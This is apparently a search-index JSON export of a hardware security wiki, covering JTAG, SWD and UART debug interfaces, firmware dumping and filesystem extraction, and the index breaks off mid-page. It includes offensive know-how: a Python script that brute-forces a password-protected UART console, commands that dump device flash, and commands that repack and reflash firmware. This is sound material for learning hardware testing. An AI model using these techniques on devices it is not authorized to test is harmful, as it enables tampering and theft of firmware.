1 line
181 KiB
JSON
1 line
181 KiB
JSON
{"config":{"lang":["en"],"separator":"[\\s\\-]+","pipeline":["stopWordFilter"]},"docs":[{"location":"","title":"\ud83d\udd0c Hardware All The Things","text":""},{"location":"#welcome-to-the-hardware-wiki","title":"Welcome to the Hardware wiki!","text":"<p>Welcome to our comprehensive Hardware Security Wiki, a curated collection of valuable payloads and bypass techniques tailored for Hardware and IoT Security. This repository serves as a dynamic and collaborative space, encouraging contributions from security enthusiasts and professionals alike.</p> <p> </p> <p>Our goal is to foster a community-driven platform where individuals can share, learn, and enhance their skills in hardware and IoT security. Whether you are a seasoned security expert or just starting, this repository is designed to provide you with a wealth of knowledge and practical insights.</p> <p> Informations from this repository is very dense, you may encounter information overflow</p>"},{"location":"#contribute-and-collaborate","title":"Contribute and Collaborate","text":"<p>We believe in the power of community and collective knowledge. Therefore, we warmly invite you to contribute your unique payloads, bypass techniques, and innovative strategies to enrich our repository. Your contributions help keep this project alive and kicking, ensuring that we can continue to bring you the latest and greatest in hardware and IoT security.</p> <p> </p> <p>You can also share the project and contribute with a Github Sponsorship. </p>"},{"location":"debug-interfaces/jtag/","title":"JTAG","text":""},{"location":"debug-interfaces/jtag/#summary","title":"Summary","text":"<ul> <li>JTAG Pins</li> <li>JTAGEnum</li> <li>References</li> </ul>"},{"location":"debug-interfaces/jtag/#jtag-pins","title":"JTAG Pins","text":"<p>Allows testing, debugging, firmware manipulation and boundary scanning</p> <p>TCK: Test Clock The drummer, or metronome that dictates the speed of the TAP controller. Voltage on this pin simply pulses up and down in a rhythmic, steady beat. On every \u201cbeat\u201d of the clock, the TAP controller takes a single action. The actual clock speed is not specified in the JTAG standard. The TAP controller accepts its speed from the outside device controlling JTAG.</p> <p>TMS: Test Mode Select Voltages on the Mode Select pin control what action JTAG takes. By manipulating the voltage on this pin, you tell JTAG what you want it to do.</p> <p>TDI: Test Data-In The pin that feeds data into the chip. The JTAG standard does not define protocols for communication over this pin. That is left up to the manufacturer. As far as JTAG is concerned, this pin is simply an ingress method for 1s and 0s to get into the chip. What the chip does with them is irrelevant to JTAG.</p> <p>TDO: Test Data-Out The pin for data coming out of the chip. Like the Data-In pin, communication protocols are not defined by JTAG. TRST: Test Reset (Optional) This optional signal is used to reset JTAG to a known good state, we'll explain why this is optional in a few paragraphs.</p> <p>AVR has lock bits that protects device from extracting flash</p> <ul> <li>Removing this lockbits will erase entire device</li> <li>If you have them set, you\u2019re not lucky, try to get firmware from other sources</li> </ul> <pre><code># Read fuses and lock bits using avarice \u2013r\n$ avarice --program --file test.elf --part atmega128 --jtag /dev/ttyUSB0 :4444\n# Acquire firmware using avrdude\n$ avrdude -p m128 -c jtagmkI \u2013P /dev/ttyUSB0 -U flash:r:\u201d/home/avr/flash.bin\":r\n</code></pre>"},{"location":"debug-interfaces/jtag/#enumeration-methods","title":"Enumeration methods","text":"<p>For enumeration methods see Enumeration/JTAG</p>"},{"location":"debug-interfaces/jtag/#references","title":"References","text":"<ul> <li>JTAGulator vs. JTAGenum, Tools for Identifying JTAG Pins in IoT Devices by Dylan Ayrey</li> <li>JTAG PIN Identification - February 21, 2017</li> <li>Hardware Debugging for Reverse Engineers Part 2: JTAG, SSDs and Firmware Extraction - Posted Apr 2, 2020 by wrongbaud</li> </ul>"},{"location":"debug-interfaces/swd/","title":"SWD","text":""},{"location":"debug-interfaces/swd/#summary","title":"Summary","text":"<ul> <li>SWD Pins</li> </ul>"},{"location":"debug-interfaces/swd/#swd-pins","title":"SWD pins","text":"<ul> <li>SWCLK: Clock into the core</li> <li>SWDIO: Data in / out</li> </ul> <p>JTAG and SWD are similar and can be interfaced with each other:</p> JTAG Mode SWD Mode Signal TCK SWCLK Clock into the core TDI - JTAG test data input TDO SWV JTAG Test data output / SWV trace data output TMS SWDIO JTAG test mode select / SWD data in and out GND GND -"},{"location":"debug-interfaces/swd/#references","title":"References","text":"<ul> <li>Hardware Debugging for Reverse Engineers Part 1: SWD, OpenOCD and Xbox One Controllers - Posted Jan 30, 2020 by wrongbaud</li> </ul>"},{"location":"debug-interfaces/uart/","title":"UART","text":""},{"location":"debug-interfaces/uart/#what-is-it","title":"What is it?","text":"<p>UART stands for Universal asynchronous receiver transmitter. Used for serial communications over a computer or peripheral device serial port.</p> <p>UART peripherals are commonly integrated into many embedded devices. UART communication makes use of baud rate to maintain synchronism between two devices. The baud rate is the rate at which information is transferred in a communication channel.</p> <p>With access to the UART, a user can see the bootloader and operating system logs.</p> <p>Generally, the line is held high (at a logical 1 value) while UART is in idle state.</p> <p>We call the most common configuration 8N1: eight data bits, no parity, and 1 stop bit.</p>"},{"location":"debug-interfaces/uart/#identifying-uart-ports","title":"Identifying UART ports","text":"<p>A UART pinout has four ports:</p> <ul> <li>TX (Transmit)</li> <li>RX (Receive)</li> <li>VCC (Voltage)</li> <li>GND (Ground)</li> </ul> <p></p> <p>To find UART there are multiple solutions:</p> <ul> <li>Search the Internet</li> <li>Check the PCB for pin labels</li> <li>Find likely candidates<ul> <li>Using a multimeter</li> <li>Using a logic analyzer</li> </ul> </li> <li>Follow PCB traces (almost always impossible)</li> </ul> <p>Keep in mind that some devices emulate UART ports by programming the General-Purpose Input/Output (GPIO) pins if there isn't enough space on the board for dedicated hardware UART pins.</p> <p>It is advised to capture the communication at 4 times the baudrate speed, to avoid decoding issues.</p>"},{"location":"debug-interfaces/uart/#using-a-multimeter","title":"Using a multimeter","text":""},{"location":"debug-interfaces/uart/#gnr-pin","title":"GNR pin","text":"<p>First, identify the GND pin by using the multimeter in continuity mode.</p> <p>Place the black probe on any grounded metallic surface, be it a part of the tested PCB or not. Then place the red probe on each of the ports. When you hear a beeping sound, you found a GND pin.</p>"},{"location":"debug-interfaces/uart/#vcc-pin","title":"VCC pin","text":"<p>Turn the multimeter to the DC voltage mode and set it up to 20V of voltage. Keep the black probe on a grounded surface. Place the red probe on a suspected pin and turn on the device.</p> <p>If the multimeter measures a constant voltage of either 3.3V or 5V, you've found the VCC pin.</p>"},{"location":"debug-interfaces/uart/#tx-pin","title":"TX pin","text":"<p>Keep the multimeter mode at DC voltage of 20V or less, and leave the black probe on a grounded surface. Move the red probe to the suspected pin and power cycle the device. If the voltage fluctuates for a few seconds and then stabilizes at the VCC value, you've most likely found the TX pin.</p> <p>This behavior happens because, during bootup, the device sends serial data through that TX pin for debugging purposes. Once it finishes booting, the UART line goes idle.</p>"},{"location":"debug-interfaces/uart/#rx-pin","title":"Rx pin","text":"<p>If you've already identified the rest of the UART pins, the nearby fourth pin is most likely the RX pin.</p> <p>Otherwise, you can identify it because it has the lowest voltage fluctuation and lowest overall value of all the UART pins.</p>"},{"location":"debug-interfaces/uart/#using-a-logic-analyzer","title":"Using a logic analyzer","text":"<p>A logic analyzer is an electronic instrument that captures and displays multiple signals from a digital system or digital circuit.</p> <p>To find the UART pins we will connect the pins to a logic analyzer and look for data being transmitted.</p>"},{"location":"debug-interfaces/uart/#hardware-setup","title":"Hardware setup","text":"<p>Make sure any system you're testing is powered off when you connect the logic analyzer's probes to it to avoid short-circuiting.</p> <ul> <li>Connect the suspected TX pin to any channel of the logic analyzer.</li> <li>Connect one of your logic analyzer's GND pins to the PCB that you're testing GND pins so they share a common ground.</li> </ul>"},{"location":"debug-interfaces/uart/#software-setup","title":"Software setup","text":""},{"location":"debug-interfaces/uart/#pulseview-sigrok","title":"PulseView / Sigrok","text":"<p> In order to make Pulseview work on Windows host, you have to use Zadig driver: https://zadig.akeo.ie/</p> <ul> <li>Click run on the top left corner in order to start the capture</li> <li>Once you get UART communication, you can add a \"protocol decoder\"</li> </ul> <p></p> <ul> <li>Select the right channel for TX and RX</li> <li>Select the baudrate, parity bit, and frame size (most common, 8N1)</li> <li>Data format, for example \"ascii\" if ascii chars are intended (boot sequence, stacktrace, etc.)</li> </ul> <p>Once you get an interesting capture, it is possible to save it and decode it using sigrok-cli, instead of PulseView GUI :</p> <pre><code>sigrok-cli -O ascii -i ./uart.sr -P uart:baudrate=115200:rx=D0 -B uart=rx\n</code></pre> <p></p>"},{"location":"debug-interfaces/uart/#saleae-based-logic-analyzer","title":"Saleae-based logic analyzer","text":"<p>This setup is for Saleae-based logic analyzer if you use a different one, refer to the constructor documentation.</p> <ul> <li>Open the Saleae software</li> <li>Create a new analyzer entry by pressing the plus (+) icon and selecting Async Serial (this is for UART).</li> <li>Select a serial channel (8 channels on Logic Analyser) and keep the default settings.</li> <li>Try with popular baud rates used in IoT devices (9600, 19200, 38400, 57600, 115200). Note that when you don't know the bit rate, you can select \"Use Autobaud\" and let the software work its magic.</li> <li>Save the configurations.</li> </ul> <p>If you want to modify the speed and the duration:</p> <ul> <li>As a rule, you should sample digital signals at least four times faster than their bandwidth.</li> <li>With serial communications, which are generally very slow, a 50 kS/s sampling rate is more than enough, although sampling faster than this does no harm.</li> <li>As for the duration, 20 seconds is enough time for the device to power on and start transmitting data.</li> </ul> <p>Now try with the popular baud rates with both the suspected pins and try to compare the results. If you find any readable text with one of the pins and the text makes some sense then that\u2019s the TX pin.</p> <p></p> <p></p>"},{"location":"debug-interfaces/uart/#connect-to-serial-port","title":"Connect to serial port","text":""},{"location":"debug-interfaces/uart/#warning","title":"WARNING","text":"<p>It's not a big deal if you confuse the UART RX and TX ports with each other, because you can easily swap the wires connecting to them without any consequences. But confusing the VCC with the GND and connecting wires to them incorrectly might fry the circuit.</p>"},{"location":"debug-interfaces/uart/#examples","title":"Examples","text":""},{"location":"debug-interfaces/uart/#connection-using-a-usb-to-ttl","title":"Connection using a USB to TTL","text":"<p>Once the ports are connected, plug the adapter into your computer. You now need to find the device file descriptor. To do that, enter the following command: <code>sudo dmesg</code>.</p> <p>Typically, it will be assigned to <code>/dev/ttyUSB0</code> if you don't have any other peripheral devices attached.</p> <p>Under Ubuntu or Debian, a non-root user cannot have access to serial ports such as ttyS0 or ttyUSB0 if he is not a member of the dialout group! The equivalent group on Arch-based distributions is uucp. In other words, you just have to add yourself to this group to have access.</p> <ul> <li>Ubuntu or Debian: <code>sudo usermod -a -G dialout $USER</code></li> <li>Arch-based: <code>sudo usermod -a -G uucp $USER</code></li> </ul>"},{"location":"debug-interfaces/uart/#detect-the-baud-rate","title":"Detect the baud rate","text":""},{"location":"debug-interfaces/uart/#most-common-baud-rate","title":"Most common baud rate","text":"<p>The most common baud rates for UART are <code>9600</code>, <code>19200</code>, <code>38400</code>, <code>57600</code> and <code>115200</code>.</p> <p>A table of other used but less common baud rates can be found here: Here</p>"},{"location":"debug-interfaces/uart/#autodetect-the-baud-rate-using-a-script","title":"Autodetect the baud rate using a script","text":"<ul> <li>devttys0/baudrate.py</li> </ul> <pre><code># Download the script\nwget https://raw.githubusercontent.com/devttys0/baudrate/master/baudrate.py\n\n# Install serial dependency\npip2.7 install serial\n\n# Run the script on \"/dev/ttyUSB0\"\npython2.7 baudrate.py -p /dev/ttyUSB0\n</code></pre>"},{"location":"debug-interfaces/uart/#using-pulseview","title":"Using PulseView","text":"<p>It is possible to get baudrate using the duration of a bit periode, using PulseView or any other bus analysis tools :</p> <p></p> <pre><code># https://www.cuemath.com/frequency-formula/\n>>> 1/8.003e-6 \n124953.14257153569\n</code></pre> <p>The closest common baudrate is : 115200. Configure the decoder and you should see ascii chars :</p> <p></p>"},{"location":"debug-interfaces/uart/#interact-with-uart","title":"Interact with UART","text":"<ul> <li> <p>Command line tools to interact with UART:</p> <pre><code>cu -l /dev/ttyUSB0 -s 115200\nmicrocom -d -s 115200 -p /dev/ttyUSB0\nminicom -b 115200 -o -D /dev/ttyUSB0 # To exit GNU screen, type Control-A k\nscreen /dev/ttyUSB0 115200\n</code></pre> </li> <li> <p>Brute force a password protected UART:</p> <pre><code>import serial, time\nport = \"/dev/ttyUSB0\"\nbaud = 115200\ns = serial.Serial(port)\ns.baudrate = baud\n\nwith open('/home/audit/Documents/IOT/passwords.lst', 'r') as f:\n lines = f.readlines()\n\n for pwd in lines:\n a = s.write(pwd.strip())\n print(\"Pwd: {}\".format(pwd.strip()))\n print(\"Sent {} bytes\".format(a))\n print(\"Result: {}\".format(s.readline()))\n time.sleep(10)\n</code></pre> </li> <li> <p>Interact with HydraBus</p> <pre><code>uart1> scan\nuart1> show\nuart1> speed 38400\nuart1> bridge\n</code></pre> </li> </ul>"},{"location":"debug-interfaces/uart/#uart-over-ble","title":"UART over BLE","text":"<p>It\u2019s an emulation of serial port over BLE. The UUID of the Nordic UART Service is <code>6E400001-B5A3-F393-E0A9-E50E24DCCA9E</code>. This service exposes two characteristics: one for transmitting and one for receiving.</p> <ul> <li>RX Characteristic (UUID: 6E400002-B5A3-F393-E0A9-E50E24DCCA9E) :<ul> <li>The peer can send data to the device by writing to the RX Characteristic of the service. ATT Write Request or ATT Write Command can be used. The received data is sent on the UART interface.</li> </ul> </li> <li>TX Characteristic (UUID: 6E400003-B5A3-F393-E0A9-E50E24DCCA9E) :<ul> <li>If the peer has enabled notifications for the TX Characteristic, the application can send data to the peer as notifications. The application will transmit all data received over UART as notifications.</li> </ul> </li> </ul>"},{"location":"debug-interfaces/uart/#references","title":"References","text":"<ul> <li>nRF UART 2.0 - Nordic Semiconductor ASA</li> <li>UART/Serial Port Emulation over BLE</li> <li>UART Over Bluetooth Low Energy</li> <li>https://makecode.microbit.org/v1/98535-28913-33692-07418</li> <li>Using the micro:bit Bluetooth Low Energy UART (serial over Bluetooth)</li> </ul>"},{"location":"enumeration/chip-identification/","title":"Chip identification","text":"<ul> <li>Google dork: <code>filetype:pdf <reference number></code></li> <li>https://datasheetspdf.com</li> <li>https://www.alldatasheet.com</li> <li>https://www.datasheets360.com</li> </ul>"},{"location":"enumeration/chip-identification/#emrf-shield","title":"EM/RF shield","text":"<p>Electromagnetic/Radio Frequency Shield should be removed to see what it is hidding.</p>"},{"location":"enumeration/fcc-id/","title":"FCC ID","text":""},{"location":"enumeration/fcc-id/#searchable-fcc-id-database","title":"Searchable FCC ID Database","text":"<p>An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission.</p> <ul> <li>fccid.io</li> </ul> <p>For legal sale of wireless deices in the US, manufacturers must:</p> <ul> <li>Have the device evaluated by an independent lab to ensure it conforms to FCC standards</li> <li>Provide documentation to the FCC of the lab results</li> <li>Provide User Manuals, Documentation, and Photos relating to the device</li> <li>Digitally or physically label the device with the unique identifier provided by the FCC (upon approved application)</li> </ul>"},{"location":"enumeration/jtag/","title":"JTAG","text":"<p>Sometimes when you have no idea what's the pinout of the JTAG port, you have to find a way to correctly identify each of the JTAG pins. There are few ways to do that, one of them is by \"bruteforcing\" the pins for <code>IDCODE</code> or <code>BYPASS</code> JTAG commands.</p> <p>There are several tools and ways to enumerate JTAG pins. Here are few:</p> <ul> <li>Probing pin voltage, resistence to VCC and GND (TODO)</li> <li>Searching with Joe Grand's JTAGulator (TODO)</li> <li>Using an Arduino Pro Micro</li> <li>Using an Raspberry Pi Pico</li> </ul>"},{"location":"enumeration/jtag/#searching-jtag-pins-with-raspberry-pi-pico","title":"Searching JTAG pins with Raspberry PI Pico","text":"<ul> <li>Raspberry Pi Pico: https://github.com/racerxdl/JTAGscan made by szymonh adapted to RP2040 by racerxdl</li> </ul>"},{"location":"enumeration/jtag/#how-does-it-work","title":"How does it work?","text":"<p>JTAGscan iterates over all defined pins (currently for RP2040, the first 16 pins) searching for TMS, TCK, TDO and TDI.</p> <p>It has two approaches:</p> <ul> <li>Try reading <code>IDCODE</code> - Only requires TMS, TCK and TDO so it's faster. Unfortunately not all devices support <code>IDCODE</code> command (although most of them do). This doesn't find the TDI pin.</li> <li>Shifting bits in <code>BYPASS</code> mode. This can find all pins, but it is slower (since not only you have one more pin to iterate over, but also need to shift \"enough\" bits through the JTAG Chain).</li> </ul>"},{"location":"enumeration/jtag/#hardware-suggestions","title":"Hardware suggestions","text":"<p>Any raspberry pi pico board should work fine for scanning JTAG ports. Make sure you check the VCC of the target to see if it is 3.3V. Being other voltage level will require a level-shifter to avoid damage.</p> <p>It is also recommended to use series 33 Ohm resistors in series with every tested pin to avoid short circuiting if some pin you're testing is an output.</p> <p></p>"},{"location":"enumeration/jtag/#programming-the-pipico","title":"Programming the PiPico","text":"<ol> <li>Go to <code>Releases</code> and download the <code>jtagscan-xxxx.zip</code></li> <li>Extract the zip file for the <code>uf2</code> file</li> <li>Plug your raspberry pi pico in the USB port while pressing the BOOT button (to enable bootloader)</li> <li>A new \"disk\" should appear in your machine. Drag the <code>uf2</code> file to the disk</li> <li>The raspberry pi pico should reboot and be recognized as a usb-serial converter</li> </ol>"},{"location":"enumeration/jtag/#using","title":"Using","text":"<p>Open the detected serial port in your favorite serial terminal application (for example, PuTTY)</p> <p>Hit the key <code>h</code> to show the help.</p> <pre><code>+-------------------------------+\n| JTAGscan Jtag Pinout Finder |\n+-------------------------------+\n a - Automatically find all pins\n i - IDCODE search for pins\n b - BYPASS search for pins\n t - TDI-only BYPASS search\n m - set pin mask, current: 0xFFFF\n d - set debug level: 1\n c - half cycle us, current: 32\n h - print this help\n+-------------------------------+\n</code></pre> <p>Hit <code>a</code> for scan the JTAG pins. This will do first a <code>IDCODE</code> scan and then a <code>BYPASS</code> scan. Depending on how many pins are in <code>pin mask</code> field (you can change it by using <code>m</code>) it should take a while. When successfully, the scanner will stop with a message like this one:</p> <pre><code> Automatically searching\n+-- Starting with IDCODE scan --+\n| TCK | TMS | TDO | IDCODE |\n+-------------------------------+\n| 2 | 3 | 0 | cba00477 |\n+----------- SUCCESS -----------+\n TCK, TMS, and TDO found.\n\n+-- BYPASS searching, just TDI -+\n| TCK | TMS | TDO | TDI | Width |\n+-------------------------------+\n| 2 | 3 | 0 | 1 | 31 |\n+----------- SUCCESS -----------+\n</code></pre>"},{"location":"enumeration/jtag/#jtagenum-with-arduino-or-raspberry-pi","title":"JTAGEnum with Arduino or Raspberry Pi","text":"<p>JTAGenum is an open source Arduino JTAGenum.ino or RaspbberyPi JTAGenum.sh (experimental) scanner. This code was built with three primary goals:</p> <ul> <li>Given a large set of pins on a device determine which are JTAG lines</li> <li>Enumerate the Instruction Register to find undocumented functionality</li> </ul> <p>\u26a0\ufe0f JTAG and device must share the same ground.</p> <p>Software Connection Set up:</p> <ul> <li>Download the INO sketch from the github</li> <li>Open the Arduino IDE and Load the downloaded JTAGEnum sketch</li> <li>Choose the correct Serial Port and Board</li> <li>Compile and Upload the sketch</li> <li>Open the Serial Monitor</li> <li>Set the correct baud rate</li> <li>Enter the command to scan (\"s\")</li> </ul> <p>Arduino PIN Layout</p> <ul> <li>Digital PIN 2(Black)</li> <li>Digital PIN 3(White)</li> <li>Digital PIN 4(Grey)</li> <li>Digital PIN 5(Maroon)</li> <li>Digital PIN 6(Blue)</li> <li>GND - GREEN</li> </ul> <p></p>"},{"location":"enumeration/jtag/#references","title":"References","text":"<ul> <li>JTAGulator vs. JTAGenum, Tools for Identifying JTAG Pins in IoT Devices by Dylan Ayrey</li> <li>JTAG PIN Identification - February 21, 2017</li> <li>Hardware Debugging for Reverse Engineers Part 2: JTAG, SSDs and Firmware Extraction - Posted Apr 2, 2020 by wrongbaud</li> </ul>"},{"location":"firmware/firmware-dumping/","title":"Firmware Dumping","text":""},{"location":"firmware/firmware-dumping/#flash-memory-types","title":"Flash Memory Types","text":"<ul> <li>NOR Flash (SOIC8 package)<ul> <li>SPI Flash</li> <li>Mostly error \"Fault-free\" memory</li> <li>Used for embedded device that need fast execution, but low storage capacity</li> </ul> </li> <li>NAND Flash (TSOP48 package)</li> <li>eMMC Flash (BGA{153} package)</li> <li>UFS Universal Flash Storage</li> </ul>"},{"location":"firmware/firmware-dumping/#flash-a-new-firmware-into-the-microcontroller","title":"Flash a new firmware into the microcontroller","text":"<ul> <li> <p>Using avrdudes/avrdude <pre><code># send raw data firmware\n$ avrdude -p m328p -c usbasp -P /dev/ttyUSB0 -b 9600 -U flash:w:flash_raw.bin\n\n# send ihex firmware\n$ avrdude -c arduino -p atmega328p -P /dev/ttyUSB* -b115200 -u -V -U flash:w:CHALLENGE.hex\n$ avrdude -c usbasp -p m328p -F -U flash:r:dump.hex:i\n\n# default\n$ avrdude -c usbasp -p m328p -C /etc/avrdude.conf -U flash:w:hardcodedPassword.ino.arduino_standard.hex\n</code></pre></p> </li> <li> <p>Using raspberrypi/picotool <pre><code># extension indicates the type (bin, uf2)\npicotool load firmware.bin\n</code></pre></p> </li> </ul>"},{"location":"firmware/firmware-dumping/#dump-flash-using-debug-port","title":"Dump flash using debug port","text":"<ul> <li> <p>Using avrdudes/avrdude <pre><code>$ avrdude -p m328p -c usbasp -P /dev/ttyUSB0 -b 9600 -U flash:r:flash_raw.bin:r\n$ avrdude -p m328p -c arduino -P /dev/ttyACM0 -b 115200 -U flash:r:flash_raw.bin:r\n$ avrdude -p atmega328p -c arduino -P/dev/ttyACM0 -b 115200 -D -U flash:r:program.bin:r -F -v \n</code></pre></p> </li> <li> <p>Using openocd-org/openocd</p> <ul> <li>Determine code space in the microcontroller (for example nRF51822 - Micro:bit), save as <code>dump_img.cfg</code>: <pre><code>init\nreset init\nhalt\ndump_image image.bin 0x00000000 0x00040000\nexit\n</code></pre></li> <li>Dump with openocd <pre><code>sudo openocd -f /home/maki/tools/hardware/openocd/tcl/interface/stlink-v2-1.cfg -f /home/maki/tools/hardware/openocd/tcl/target/nrf51.cfg -f dump_fw.cfg\n</code></pre></li> </ul> </li> <li> <p>Using raspberrypi/picotool</p> <ul> <li>Build PicoTool, you will need the pico-sdk <pre><code># PicoSDK\ngit clone https://github.com/raspberrypi/pico-sdk.git\ncd pico-sdk\ngit submodule update --init\n\n# Picotool\ncd ..\ngit clone https://github.com/raspberrypi/picotool.git\ncd picotool\nmkdir build\ncd build\ncmake -DPICO_SDK_PATH=../pico-sdk ..\nmake\n</code></pre></li> <li>Dump the program or the whole flash memory <pre><code>sudo ./picotool save -F /tmp/out.bin\nSaving file: [==============================] 100%\nWrote 73312 bytes to /tmp/out.bin\n\nsudo ./picotool save --all -F /tmp/out2.bin\nSaving file: [==============================] 100%\nWrote 2097152 bytes to /tmp/out2.bin\n</code></pre></li> </ul> </li> </ul>"},{"location":"firmware/firmware-dumping/#dump-flash-via-spi","title":"Dump Flash via SPI","text":"<ul> <li> <p>Using flashrom/flashroom <pre><code>sudo apt-get install build-essential pciutils usbutils libpci-dev libusb-dev libftdi1 libftdi-dev zlib1g-dev subversion libusb-1.0-0-dev\nsvn co svn://flashrom.org/flashrom/trunk flashrom\ncd flashrom\nmake\n\nflashrom -p ft232_spi:type:232h -r spidump.bin\nflashrom -p linux_spi:dev=/dev/spidev0.0,spispeed=512 -r spi_dump.bin\nflashrom -p serprog:dev=/dev/ttyACM0,spispeed=160k -r dump_spi.bin -c \"MX25L6406E/MX25L6408E\"\n</code></pre></p> </li> <li> <p>Using HydraBus: hydrabus/hydrafw/hydra_spi_dump.py <pre><code>./hydra_spi_dump.py firmware.bin 1024 0x000000 fast\n</code></pre></p> </li> </ul>"},{"location":"firmware/firmware-dumping/#convert-ihex-to-elf","title":"Convert ihex to elf","text":"<p>The Intel HEX is a transitional file format for microcontrollers, (E)PROMs, and other devices. The documentation states that HEXs can be converted to binary files and programmed into a configuration device.</p> <p>Each line in the ihex file starts with :</p> <ul> <li>a colon :</li> <li>followed by ONE BYTE = record length</li> <li>followed by TWO BYTES = offset to load</li> <li>followed by ONE BYTE = Record Type</li> <li>Last BYTE in the line = Checksum</li> </ul> <p>Convert .hex(ihex format) to .elf file with <code>avr-objcopy</code> or with an online tool http://matrixstorm.com</p> <pre><code>$ avr-objcopy -I ihex -O elf32-avr dump.hex dump.elf\n# or \n$ objcopy -I ihex chest.hex -O binary chest.bin ; xxd chest.bin\n</code></pre> <p>Alternative with Python <code>bincopy</code></p> <pre><code>import bincopy\nimport sys\n\nf = bincopy.BinFile()\nf.add_ihex_file(sys.argv[1])\nprint(f.as_binary())\n</code></pre> <p>Quick strings on .hex</p> <pre><code>cat defaultPassword.ino.arduino_standard.hex | tr -d \":\" | tr -d \"\\n\" | xxd -r -p | strings \n</code></pre> <p>Inspect the assembly with <code>avr-objdump -m avr -D chest.hex</code>.\\ Emulate : <code>qemu-system-avr -S -s -nographic -serial tcp::5678,server=on,wait=off -machine uno -bios chest.bin</code></p>"},{"location":"firmware/firmware-dumping/#explore-filesystem","title":"Explore Filesystem","text":""},{"location":"firmware/firmware-dumping/#common-filesystem","title":"Common Filesystem","text":"<ul> <li>SquashFS : It is a compressed read-only filesystem commonly used in Linux-based Firmware. It provides a good flexibility because it supports creating writable overlay filesystems, allowing changes to be made to the filesystem at runtime.</li> <li>CramFS (Compressed ROM Filesystem) : Simple read-only filesystem, that supports compression.</li> <li>ROMFS (Read-Only Memory Filedystem) : Simple filesystem that is strictly read-only, and do not provide compression support.</li> <li>YAFFS/YAFFS2 (Yet Another Flash Filesystem) : This filesystem is specifically designed for NAND Flash memory. In particular, it incorporates ECC management for ensuring data integrity. Filesystem integrity is also maintained by storing metadata redundantly.</li> <li>JFFS/JFFS2 (Journalized Flash Filesystem) : This filesystem is also designed for NAND Flash memory. JFFS utilizes a journaling mechanism to track changes to the filesystem, ensuring data consistency and integrity even in the event of sudden power loss or system crashes. It also supports ECC.</li> <li>UBIFS (Unsorted Block Image Filesystem) : UBIFS is a successor to JFFS2 and is optimized for NAND flash memory. It offers improved performance, reliability, and scalability, with features such as compression, encryption, and fast mounting. UBIFS supports multiple partitions.</li> </ul> Filesystem RO/RW Magic Tool SquashFS RO sqsh, hsqs, qshs, sqsl unsquashfs, 7zip JFFS(2) RW 0x07C0 (v1), 0x72b6(v2) jefferson YAFFS(2) RW 0x5941ff53 unyaffs CramFS RO 0x28cd3d45 uncramfs, 7zip UBIFS RW 0x06101831 ubi_reader RomFS RO 0x7275 / CPIO RO \"070707\" cpio, 7zip"},{"location":"firmware/firmware-dumping/#tools","title":"Tools","text":"<ul> <li> <p>unix/strings <pre><code>$ strings file.bin\n\n$ strings -e l file.bin\nThe strings -e flag specifies the encoding of the characters. -el specifies little-endian characters 16-bits wide (e.g. UTF-16)\n\n$ strings -tx file.bin\nThe -t flag will return the offset of the string within the file. -tx will return it in hex format, T-to in octal and -td in decimal.\n</code></pre></p> </li> <li> <p>unix/dd <pre><code>$ dd if=firmware.bin of=firmware.chunk bs=1 skip=$((0x200)) count=$((0x400-0x200))\nIf we wanted to run it a little faster, we could increase the block size:\n$ dd if=firmware.bin of=firmware.chunk bs=$((0x100)) skip=$((0x200/0x100)) count=$(((0x400-0x200)/0x100))\n</code></pre></p> </li> <li> <p>ReFirmLabs/binwalk <pre><code>$ binwalk -Me file.bin\n$ binwalk -Y dump.elf \nDECIMAL HEXADECIMAL DESCRIPTION\n--------------------------------------------------------------------------------\n3708 0xE7C ARM executable code, 16-bit (Thumb), little endian, at least 522 valid instructions\n</code></pre></p> </li> <li> <p>onekey-sec/unblob <pre><code>docker run --rm --pull always -v /path/to/extract-dir/on/host:/data/output -v /path/to/files/on/host:/data/input ghcr.io/onekey-sec/unblob:latest /data/input/path/to/file\ndocker run --rm --pull always ghcr.io/onekey-sec/unblob:latest --help\n</code></pre></p> </li> <li> <p>squashfs-tools/unsquashfs <pre><code>sudo unsquashfs -f -d /media/seagate /tmp/file.squashfs\n</code></pre></p> </li> <li> <p>onekey-sec/jefferson - JFFS2 filesystem extraction tool <pre><code>pip install jefferson\njefferson filesystem.img -d outdir\njefferson file.jffs2 -d jffs2\n</code></pre></p> </li> <li> <p>whataday/unyaffs - YAFFS2 filesystem extraction tool <pre><code>unyaffs [-l <layout>] [-t] [-v] [-V] <image_file_name> [<base dir>]\n -l <layout> set flash memory layout\n layout=0: detect chunk and spare size (default)\n layout=1: 2K chunk, 64 byte spare size\n layout=2: 4K chunk, 128 byte spare size\n layout=3: 8K chunk, 256 byte spare size\n layout=4: 16K chunk, 512 byte spare size\n -t list image contents\n -v verbose output\n -V print version\n</code></pre></p> </li> </ul>"},{"location":"firmware/firmware-dumping/#write-new-firmware","title":"Write new firmware","text":"<ul> <li> <p>Repack firmware <pre><code>mksquashfs4 squashfs-root myrootfs {options}\ndd if=myrootfs of=dump/bin bs=1 seek=<offset> conv=notrunc\n</code></pre></p> </li> <li> <p>Flashrom write <pre><code>flashrom -p ft2232_spi:type=232H -w dump.bin\n</code></pre></p> </li> </ul>"},{"location":"firmware/firmware-dumping/#type-of-firmware","title":"Type of firmware","text":"<ul> <li><code>SREC</code> - Motorola S-Record : All S-record file lines start with a capital S.</li> <li><code>Intel HEX</code> lines all start with a colon.</li> <li><code>TI-TXT</code> is a Texas Instruments format, usually for the MSP430 series. Memory addresses are prepended with an @, and data is represented in hex.</li> <li><code>Raw</code> NAND dumps</li> </ul>"},{"location":"firmware/firmware-dumping/#check-entropy","title":"Check entropy","text":"<p>High entropy = probably encrypted (or compressed). Low entropy = probably not</p> <pre><code>$ binwalk -E fw\n</code></pre>"},{"location":"firmware/firmware-dumping/#encrypted-firmware","title":"Encrypted firmware","text":"<ul> <li>MINDSHARE: DEALING WITH ENCRYPTED ROUTER FIRMWARE</li> </ul>"},{"location":"firmware/firmware-dumping/#over-the-air-updates","title":"Over-the-air updates","text":"<p>TODO</p>"},{"location":"firmware/firmware-dumping/#references","title":"References","text":"<ul> <li>Extracting Firmware from Embedded Devices (SPI NOR Flash) - Flashback Team - 9 sept. 2022</li> <li>Real Hardware Hacking for S$30 or Less - Joe FitzPatrick - 31 march 2020</li> </ul>"},{"location":"firmware/firmware-reverse-engineering/","title":"Firmware Reverse Engineering","text":""},{"location":"firmware/firmware-reverse-engineering/#loading-bare-metal-binaries-into-ida","title":"Loading bare-metal binaries into IDA","text":"<p>Requirements:</p> <ul> <li>The load address is the address in memory that the binary is being executed from.</li> <li>The entry point is the location within the binary where the processor starts 